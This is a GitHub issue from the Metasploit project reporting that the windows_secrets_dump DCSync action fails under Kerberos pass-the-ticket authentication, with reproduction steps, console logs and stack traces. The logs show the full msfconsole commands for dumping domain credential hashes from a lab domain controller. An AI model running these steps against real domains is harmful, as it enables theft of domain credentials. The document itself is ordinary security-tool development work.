Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Windows Secrets Dump DOMAIN action (DCSync) fails with PTT #18312

Closed
zeroSteiner opened this issue Aug 23, 2023 · 0 comments · Fixed by #18419
Closed

Windows Secrets Dump DOMAIN action (DCSync) fails with PTT #18312

zeroSteiner opened this issue Aug 23, 2023 · 0 comments · Fixed by #18419
Assignees
@smashery
Labels
bug confirmed Issues confirmed by a committer

Comments

@zeroSteiner
Copy link
Contributor

The windows_secrets_dump module's DOMAIN action fails when the authentication is configured for pass-the-ticket style authentication. That is when the user is authenticating with a Kerberos ticket and not a password. It should be noted that the module will work if a password is set and the authentication is configured for Kerberos because the password will be used for the DCERPC client.

To reproduce the issue:

  1. Have a standard domain controller target
  2. Use the windows_secrets_dump module and set the datastore options to authenticate with Kerberos
  3. Set the necessary datastore options to authenticate with kerberos.
  4. Run the domain action with run ACTION=DOMAIN. See the debug messages showing that Kerberos tickets were issued.
  5. Unset the password
  6. Run the domain action again and see the debug messages showing that the cached Kerberos ticket was used. See the action failed.
Example Output 
msf6 > use windows_secrets_dump

Matching Modules
================

   #  Name                                   Disclosure Date  Rank    Check  Description
   -  ----                                   ---------------  ----    -----  -----------
   0  auxiliary/gather/windows_secrets_dump                   normal  No     Windows Secrets Dump


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/windows_secrets_dump

[*] Using auxiliary/gather/windows_secrets_dump
msf6 auxiliary(gather/windows_secrets_dump) > set RHOSTS 192.168.159.10
set SMBUserRHOSTS => 192.168.159.10
msf6 auxiliary(gather/windows_secrets_dump) > set SMBUser smcintyre
SMBUser => smcintyre
msf6 auxiliary(gather/windows_secrets_dump) > set SMBPass Password1!
SMBPass => Password1!
msf6 auxiliary(gather/windows_secrets_dump) > set SMBDomain msflab.local
SMBDomain => msflab.local
msf6 auxiliary(gather/windows_secrets_dump) > set DomainControllerRhost 192.168.159.10
DomainControllerRhost => 192.168.159.10
msf6 auxiliary(gather/windows_secrets_dump) > set SMB::RHOSTNAME dc.msflab.local
SMB::RHOSTNAME => dc.msflab.local
msf6 auxiliary(gather/windows_secrets_dump) > set SMB::Auth kerberos 
SMB::Auth => kerberos
msf6 auxiliary(gather/windows_secrets_dump) > klist -d
Kerberos Cache
==============
No tickets

msf6 auxiliary(gather/windows_secrets_dump) > run ACTION=DOMAIN
[*] Running module against 192.168.159.10

[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823164139_default_192.168.159.10_mit.kerberos.cca_063196.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823164139_default_192.168.159.10_mit.kerberos.cca_281500.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid delegation TGS-Response
[*] 192.168.159.10:445 - Service RemoteRegistry is in stopped state
[*] 192.168.159.10:445 - Starting service...
[*] 192.168.159.10:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 192.168.159.10:445 - Using the DRSUAPI method to get NTDS.DIT secrets
[*] 192.168.159.10:445 - SID enumeration progress -  0 / 11 ( 0.00%)
[*] 192.168.159.10:445 - SID enumeration progress - 11 / 11 (  100%)
[redacted]
[*] 192.168.159.10:445 - Cleaning up...
[*] 192.168.159.10:445 - Stopping service RemoteRegistry...
[*] Auxiliary module execution completed
msf6 auxiliary(gather/windows_secrets_dump) > set --clear SMBPass
SMBPass => 
msf6 auxiliary(gather/windows_secrets_dump) > run ACTION=DOMAIN
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - 192.168.159.10:88 - Using cached credential for cifs/[email protected] [email protected]
[*] 192.168.159.10:445 - Service RemoteRegistry is already running
[*] 192.168.159.10:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 192.168.159.10:445 - Using the DRSUAPI method to get NTDS.DIT secrets
[*] 192.168.159.10:445 - SID enumeration progress -  0 / 11 ( 0.00%)
[*] 192.168.159.10:445 - SID enumeration progress - 11 / 11 (  100%)
[*] 192.168.159.10:445 - Cleaning up...
[-] 192.168.159.10:445 - Auxiliary failed: NoMethodError undefined method `encode' for nil:NilClass
[-] 192.168.159.10:445 - Call stack:
[-] 192.168.159.10:445 -   /home/smcintyre/.rvm/gems/ruby-3.0.4@metasploit-framework/gems/ruby_smb-3.2.5/lib/ruby_smb/utils.rb:5:in `safe_encode'
[-] 192.168.159.10:445 -   /home/smcintyre/.rvm/gems/ruby-3.0.4@metasploit-framework/gems/ruby_smb-3.2.5/lib/ruby_smb/dcerpc/client.rb:124:in `initialize'
[-] 192.168.159.10:445 -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/gather/windows_secrets_dump.rb:631:in `new'
[-] 192.168.159.10:445 -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/gather/windows_secrets_dump.rb:631:in `connect_drs'
[-] 192.168.159.10:445 -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/gather/windows_secrets_dump.rb:796:in `dump_ntds_hashes'
[-] 192.168.159.10:445 -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/gather/windows_secrets_dump.rb:1131:in `run'
[*] Auxiliary module execution completed
msf6 auxiliary(gather/windows_secrets_dump) > set SMBPass ''
SMBPass => 
msf6 auxiliary(gather/windows_secrets_dump) > run ACTION=DOMAIN
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - 192.168.159.10:88 - Using cached credential for cifs/[email protected] [email protected]
[*] 192.168.159.10:445 - Service RemoteRegistry is already running
[*] 192.168.159.10:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 192.168.159.10:445 - Using the DRSUAPI method to get NTDS.DIT secrets
[*] 192.168.159.10:445 - SID enumeration progress -  0 / 11 ( 0.00%)
[*] 192.168.159.10:445 - SID enumeration progress - 11 / 11 (  100%)
[-] 192.168.159.10:445 - Auxiliary aborted due to failure: unexpected-reply: [RubySMB::Dcerpc::Error::InvalidPacket] Error reading the RubySMB::Dcerpc::Response response
[*] Auxiliary module execution completed
msf6 auxiliary(gather/windows_secrets_dump) >

Note that if the password is an empty string, you'll get one error and that if the password is cleared with set --clear SMBPass that you'll get a different error. In both cases the module fails.

The desired outcome is that this action should succeed using only kerberos tickets for authentication given that the account has the necessary permissions of course.

I am pretty confident that the issue is related to the DCERPC client requiring password authentication. It will probably need to be updated with some mechanism to allow the authentication to be replaced with Metasploit's Kerberos authenticator in a similar manner to what the RubySMB::Client uses.
@smcintyre-r7 smcintyre-r7 added the confirmed Issues confirmed by a committer label Oct 3, 2023
@smcintyre-r7 smcintyre-r7 linked a pull request Oct 3, 2023 that will close this issue
DCSync using Kerberos #18419
Merged
9 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@smashery smashery

Labels
bug confirmed Issues confirmed by a committer
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

DCSync using Kerberos smashery/metasploit-framework
3 participants
@zeroSteiner @smashery @smcintyre-r7